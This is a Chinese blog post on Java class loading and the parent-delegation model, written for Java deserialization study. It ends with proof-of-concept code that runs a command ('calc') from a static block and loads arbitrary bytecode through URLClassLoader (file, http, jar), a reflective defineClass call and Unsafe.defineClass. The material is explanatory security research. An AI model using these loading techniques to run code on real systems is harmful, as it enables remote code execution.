类的动态加载-双亲委派模型

已于 2024-07-04 23:17:17 修改
阅读量1.2k 收藏 9
点赞数 30
分类专栏: Java反序列化 文章标签: java Java反序列化
于 2024-07-04 17:17:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45436292/article/details/140184787
版权

java反射基础

Java 基础 - 反射机制详解 | Java 全栈知识体系 (pdai.tech)

类的动态加载

参考链接:类的动态加载

构造是和实例化也就是对象相关的。

静态代码块是在初始化的时候就调用的 Class.forName();就会调用静态代码块

forName,加载类时默认初始化

        Class.forName();    //默认初始化

        ClassLoader classLoader = ClassLoader.getSystemClassLoader();
        Class.forName("Person",false,classLoader);//不进行初始化

类加载器的研究

类加载器,加载类时默认不初始化。

        ClassLoader classLoader = ClassLoader.getSystemClassLoader();
        Class<?> person = classLoader.loadClass("Person");
        Class<?> person = Class.forName("Person", false, classLoader); //两个代码作用相同

底层的原理,实现加载任意的类

java双亲委派

在这里插入图片描述

image-20240704094900997

Class<?> person1 = classLoader.loadClass("Person");处打个断点进行调试。

首先调用ClassLoader.classLoader(a)因为AppClassLoader中的classLoader参数是两个,所以调用到了其父类ClassLoader.classLoader(a,b)

之后ClassLoader.classLoader(a,b)调用AppClassLoader.classLoader(a), —> ClassLoader.classLoader(a,b)

在ClassLoader.classLoader(a,b)中就涉及到了双亲委派模型

protected Class<?> loadClass(String name, boolean resolve)
    throws ClassNotFoundException
{
    synchronized (getClassLoadingLock(name)) {
        // First, check if the class has already been loaded
        Class<?> c = findLoadedClass(name);             //检查类有没有被加载
        if (c == null) {                                //类没有被加载 进入
            long t0 = System.nanoTime();
            try {
                if (parent != null) {                   //还有父加载器的话,让父加载器loadClass   这里也就是ExtClassLoader
                    c = parent.loadClass(name, false);
                } else {
                    c = findBootstrapClassOrNull(name);
                }
            } catch (ClassNotFoundException e) {
                // ClassNotFoundException thrown if class not found
                // from the non-null parent class loader
            }

            if (c == null) {
                // If still not found, then invoke findClass in order
                // to find the class.
                long t1 = System.nanoTime();
                c = findClass(name);

                // this is the defining class loader; record the stats
                sun.misc.PerfCounter.getParentDelegationTime().addTime(t1 - t0);
                sun.misc.PerfCounter.getFindClassTime().addElapsedTimeFrom(t1);
                sun.misc.PerfCounter.getFindClasses().increment();
            }
        }
        if (resolve) {
            resolveClass(c);
        }
        return c;
    }
}

进入ExtClassLoader.loadCLass, 因为其中没有loadCLass所以又直接调用到了,上面CLass.loadClass方法。

这次

protected Class<?> loadClass(String name, boolean resolve)
    throws ClassNotFoundException
{
    synchronized (getClassLoadingLock(name)) {
        // First, check if the class has already been loaded
        Class<?> c = findLoadedClass(name);
        if (c == null) {
            long t0 = System.nanoTime();
            try {
                if (parent != null) {              //找不到父加载器了,因为bootstrap ClassLoader 不在java中
                    c = parent.loadClass(name, false);
                } else {
                    c = findBootstrapClassOrNull(name);  //走到这一步 也不回找到 因为是一个普通的类 不会调用BootstrapClassLoader去加载
                }
            } catch (ClassNotFoundException e) {
                // ClassNotFoundException thrown if class not found
                // from the non-null parent class loader
            }

            if (c == null) {
                // If still not found, then invoke findClass in order
                // to find the class.
                long t1 = System.nanoTime();
                c = findClass(name);              //之后走到findClass("Person") 因为最后是在App CLassLoader中加载的 所以ExtClassLoader中先不跟了 返回的是null

                // this is the defining class loader; record the stats
                sun.misc.PerfCounter.getParentDelegationTime().addTime(t1 - t0);
                sun.misc.PerfCounter.getFindClassTime().addElapsedTimeFrom(t1);
                sun.misc.PerfCounter.getFindClasses().increment();
            }
        }
        if (resolve) {
            resolveClass(c);
        }
        return c;
    }
}

之后return c=null逻辑又回到了 AppCLassLoader的loadCLass

protected Class<?> loadClass(String name, boolean resolve)
    throws ClassNotFoundException
{
    synchronized (getClassLoadingLock(name)) {
        // First, check if the class has already been loaded
        Class<?> c = findLoadedClass(name);             //检查类有没有被加载
        if (c == null) {                                //类没有被加载 进入
            long t0 = System.nanoTime();
            try {
                if (parent != null) {                   //还有父加载器的话,让父加载器loadClass   这里也就是ExtClassLoader
                    c = parent.loadClass(name, false);  //ExtCLassLoader返回null。所以c=null
                } else {
                    c = findBootstrapClassOrNull(name);
                }
            } catch (ClassNotFoundException e) {
                // ClassNotFoundException thrown if class not found
                // from the non-null parent class loader
            }

            if (c == null) {                           //因为C=null 进入
                // If still not found, then invoke findClass in order
                // to find the class.
                long t1 = System.nanoTime();
                c = findClass(name);                   //进到findClass("Person") 跟一下这里

                // this is the defining class loader; record the stats
                sun.misc.PerfCounter.getParentDelegationTime().addTime(t1 - t0);
                sun.misc.PerfCounter.getFindClassTime().addElapsedTimeFrom(t1);
                sun.misc.PerfCounter.getFindClasses().increment();
            }
        }
        if (resolve) {
            resolveClass(c);
        }
        return c;
    }
}

下面跟进findClass(“Person”)

因为AppClassLoader总没有findClass方法,所以找到了其父类URLClassLoader的findClass

protected Class<?> findClass(final String name)
    throws ClassNotFoundException
{
    final Class<?> result;
    try {
        result = AccessController.doPrivileged(
            new PrivilegedExceptionAction<Class<?>>() {
                public Class<?> run() throws ClassNotFoundException {
                    String path = name.replace('.', '/').concat(".class");
                    Resource res = ucp.getResource(path, false);          //ucp是类的路径 URLClassPath类
                    if (res != null) {                                    //res不为空 进入
                        try {
                            return defineClass(name, res);                //主要跟一下defindClass
                        } catch (IOException e) {
                            throw new ClassNotFoundException(name, e);
                        }
                    } else {
                        return null;
                    }
                }
            }, acc);
    } catch (java.security.PrivilegedActionException pae) {
        throw (ClassNotFoundException) pae.getException();
    }
    if (result == null) {
        throw new ClassNotFoundException(name);
    }
    return result;
}

下图可以观察到 AppClassLoader调用findCLass时,ucp(查找路径)里面加入了file:/H:/java_des/target/classes/(我们项目Class路径),所以可以查到Person类,res不为空。

image-20240704135445797

跟一下URLCLassLoader.defineClass

image-20240704140107786

return 调用的是URLClassLoader的父类SecureClassLoader的defineClass方法

image-20240704140249660

return 调用的是CLassLoader的defineClass方法

protected final Class<?> defineClass(String name, byte[] b, int off, int len,
                                     ProtectionDomain protectionDomain)     //这里name是类名,b是字节码
    throws ClassFormatError
{
    protectionDomain = preDefineClass(name, protectionDomain);
    String source = defineClassSourceLocation(protectionDomain);
    Class<?> c = defineClass1(name, b, off, len, protectionDomain, source); //在defineClass1完成类的加载(字节码) 是个native类
    postDefineClass(c, protectionDomain);
    return c;
}

之后一层一层返回加载的类,加载到了URLCLass.findClass中return defineClass(name, res);处。

下一步,也就是最终返回到了我们写的loadClass方法调用代码处,可以看到返回了Person类

在这里插入图片描述

总结

ClassLoader -> SecureClassLoader -> URLCLassLoader -> AppClassLoader (继承关系 父->子)

ClassLoader.loadClass -> URLCLass.findClass(重写方法)(路径中能找到类才进入defineCLass) ->SecureClassLoader.defineClass(从字节码加载类)->ClassLoader.defineClass

image-20240704144522395

利用

先编写并编译一个弹计算器的代码,放到一个指定路径,之后把项目中的Test.class删除(项目路径没有Test.class,看看是否能够通过类加载器的利用,找到类)

import java.io.IOException;

public class Test {
    static  {  //静态代码块
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

URLCLassLoader 任意类加载:file/http/jar 协议

public class LoadClassTest {
    public static void main(String[] args) throws Exception {
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("file:///G:\\Java反序列化\\class_test\\")}); //指定Class的查找路径
        
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:9999/")}); //指定Class的查找路径
        
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("jar:http://127.0.0.1:9999/Test.jar!/")}); //指定Class的查找路径
        Class<?> c = urlClassLoader.loadClass("Test"); //load Person类
        c.newInstance();  //实例化
    }
}

ClassLoader.defineClass 字节码加载任意类 私有

public class LoadClassTest {
    public static void main(String[] args) throws Exception {

        ClassLoader classLoader = ClassLoader.getSystemClassLoader();
        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        defineClass.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("G:\\Java反序列化\\class_test\\Test.class"));
        Class c = (Class) defineClass.invoke(classLoader, "Test",code, 0, code.length);  //对象 类名 字节码 字节码起始 字节码长度 defineClass返回的是Class<?> 这里也就是返回的Test.class
        c.newInstance(); //实例化 触发静态代码块
    }
}

Unsafe.defineClass 字节码加载 public类但是不能直接调用,需要先反射调用public方法实例化类

Unsafe类中defineClass方法是public的,但是是个单例模式,不能直接调用defineClass()。

看到有个getUnsafe方法,是public的,但是直接调用Unsafe.getUnsafe()是会报错的因为有个安全检查。

最后找到theUnsafe属性

private static final Unsafe theUnsafe = new Unsafe();

所以反射调用theUnsafe属性去实例化Unsafe

public native Class<?> defineClass(String name, byte[] b, int off, int len,
                                   ClassLoader loader,
                                   ProtectionDomain protectionDomain);

public class LoadClassTest {
    public static void main(String[] args) throws Exception {

        ClassLoader classLoader = ClassLoader.getSystemClassLoader();
        byte[] code = Files.readAllBytes(Paths.get("G:\\Java反序列化\\class_test\\Test.class"));

        Class unsafe = Unsafe.class;
        Field theUnsafeField = unsafe.getDeclaredField("theUnsafe");
        theUnsafeField.setAccessible(true);
        Unsafe unsafe1 = (Unsafe) theUnsafeField.get(null);
        Class<?> test = unsafe1.defineClass("Test", code, 0, code.length, classLoader, null);
        test.newInstance();
    }
}

Spring里面可以直接生成

y06_z
关注
  • 30
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
加载机制和双亲委派模型
m0_72636465的博客
12-08 504
加载机制和双亲委派模型
jvm 加载机制 双亲委派模型
04-17
jvm 加载机制 双亲委派模型 文档 jvm 加载机制 双亲委派模型 文档
加载器 - 双亲委派模型
蒋大钊的博客
09-17 343
学习与思考Java加载中的双亲委派模型,加入一些源码分析,demo编码
加载器以及双亲委派模型
qq_49005459的博客
03-20 495
Java虚拟机把描述的数据从Class文件加载到内存,并对数据进行校验、转换解析和初始化,最终形成可以被虚拟机直接使用的Java型,这个过程被称作虚拟机的加载机制。 自JDK1.2以来,Java一直保持着三层加载器、双亲委派加载架构。 一.存放位置 1.启动加载器(Bootstrap Class Loader): 存放在jre\lib 目录下的 rt.jar,启动加载器无法被Java程序直接引用。 2.扩展加载器(Extension Class Loade..
加载器-双亲委派机制
weixin_40461030的博客
07-03 2780
双亲委派机制
加载双亲委派模型
果酱 の 博客
07-24 2991
加载双亲委派模型Java加载器的一种工作机制。它基于一种层次化的加载器结构,通过委派的方式实现加载和查找。在这个模型中,每个加载器都有一个父加载器,当一个加载器需要加载一个时,它首先将加载请求委派给父加载器,只有当父加载器无法完成加载任务时,才由当前加载器自己去加载加载双亲委派模型Java加载器的一种工作机制,通过委派的方式实现加载和查找。它通过隔离命名空间、提高安全性和鼓励代码复用等方式,为Java程序提供了良好的加载机制。
JVM 加载机制-双亲委派模型(parent-delegation model)
小雨点的博客
06-02 183
JVM加载机制
Java虚拟机加载器--双亲委派模型
一切有为法,如梦亦如幻,如露亦如电,应作如是观。
08-01 259
1. 双亲委派模型是什么? 当某个加载器需要加载某个.class字节码文件时,它首先把这个任务委托给它的上级加载器,递归这个操作,如果上级的加载器没有加载,自己才会去加载这个。 2. 双亲委派模型的工作原理? 【1】如果一个加载器收到了加载的请求,它首先不会自己去尝试加载这个,而是把这个请求委派给父加载器去执行; 【2】如果父加载器还存在其父加载器,则进一步向上委托,依次递归,请求最终将到达顶层的启动加载器;(每一个层次的加载器都是如此,因此所有的加载请求最终都应该传送到最
【JVM】(二)深入理解Java加载机制与双亲委派模型
qq_61635026的博客
08-02 894
Java 中,加载机制是 Java 虚拟机(JVM)的一个重要组成部分,它负责在运行时将 Java 加载到内存中,并转换为可执行代码。理解加载机制对于深入理解 Java 的运行机制和开发高质量的Java应用程序至关重要。 本文将深入探讨 Java加载过程以及双亲委派模型。首先,我将详细介绍加载过程的五个阶段。接下来,将重点介绍双亲委派模型以及它解决的问题。
JVM 加载机制及双亲委派模型
java123456111的博客
05-23 1123
整体的流程 Java 中的所有,必须被装载到 jvm 中才能运行,这个装载工作是由 jvm 中的加载器完成的,加载器所做的工作实质是把文件从硬盘读取到内存中,JVM 在加载的时候,都是通过 ClassLoader 的 loadClass()方法来加载 class 的,loadClass 使用双亲委派模型。 先解析一下这张图,图表示的整个声明周期,从被加载到虚拟机内存开始,到卸载出内存为止,包含 7 个阶段,其中验证、准备、解析 3 个阶段统称为连接。 加载、验证、准备、初始化和卸载这 5 个
JVM的加载过程以及双亲委派模型详解
08-25
JVM加载过程和双亲委派模型详解 JVM加载过程是将.class文件加载到JVM内存中,然后转化为Class对象的过程。加载器是根据指定全限定名称将class文件加载到JVM内存,然后再转化为Class对象。 加载器分: *...
【JVM】加载器与双亲委派模型
12-21
加载器按照特定的规则工作,其中最核心的就是双亲委派模型加载器主要有三种型: 1. 启动加载器(Bootstrap ClassLoader):这是JVM内核的一部分,由C++实现,不继承自ClassLoader。它负责加载JVM的核心...
第23讲请介绍加载过程,什么是双亲委派模型1
08-04
双亲委派模型加载机制的核心,它规定当加载器尝试加载某个型时,除非父加载器找不到该型,否则任务会被委托给父加载器。这样可以避免的重复加载,确保所有都有统一的加载源,从而维护系统的一致性和...
Java虚拟机加载机制及双亲委派模型
05-07
Java虚拟机加载机制及双亲委派模型
12. Hibernate 模板设计模式
最新发布
这是一个web全栈开发的博客,取其精华去其糟粕,争取让大家一看就懂,一学就会,一用就成~
07-22 1084
如何运用模板设计模式重构 Hibernate 操作流程;持久化对象与序列化接口;OOP中有一个编码原则 :写仅写一次。翻译过来就是,不要重复,要重用。答案是:使用模板设计模式进一步封装Hibernate的操作。在真实项目中,Hibernate仅仅只是完成项目中的一部分工作,需要和其它,如Spring等框架联合工作,一起承担整体项目的开发。Spring框架中就提供的有Hibernate模板对象。一个常规的、频繁的操作代码中,大部分代码不需要变动,只有小部分代码需要根据需求变动。
Java内存模型
weixin_44267758的博客
07-19 764
此处的变量不是指java编程中的变量,它包括了实例字段,静态字段和构成数值对象的元素,但不包括局部变量和方法参数。JMM规定所有变量都存储在主内存中。每条线程有自己的工作内存,工作内存中保留了该线程使用到变量的主内存的副本。线程对变量的所有操作都必须在工作内存中进行,不能直接读写主内存的变量,不同的线程间也无法直接访问对方工作内存的变量,线程之间的变量值传递需要通过主内存来完成。
Promise 详解(原理篇)
山重水复疑无路,柳暗花明又一村。
07-20 739
Promise 是一种异步编程的解决方案。在异步操作中,callback 会导致回调地狱的问题,Promise 解决了这个问题。一个 Promise对象有以下三种状态:pending:初始状态,既不是成功,也不是失败状态。:意味着操作成功完成。rejected:意味着操作失败。当 new Promise() 被实例化后,即表示 Promise 进入 pending 初始化状态,准备就绪,等待运行。
接口防刷!利用redisson快速实现自定义限流注解
架构师小吴的博客
07-18 1301
如登录接口,当用户使用手机号+验证码登录时,一般我们会生成6位数的随机验证码,并将验证码有效期设置为1-3分钟,如果对登录接口不加以限制,理论上,通过技术手段,快速重试100000次,即可将验证码穷举出来。解决思路:对登录接口加上限流操作,如限制一分钟内最多登录5次,登录次数过多,就返回失败提示,或者将账号锁定一段时间。在日常开发中,一些重要的对外接口,需要加上访问频率限制,以免造成资��损失。ok,通过以上两步,即可完成我们的限流注解了,下面通过一个接口验证下效果。
1、说说加载双亲委派模型
09-01
加载双亲委派模型Java中用于加载的一种机制。根据这个模型,当一个加载器收到加载某个的请求时,它首先会委托给它的父加载器去尝试加载,只有在父加载器无法加载的情况下,才会由当前加载器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值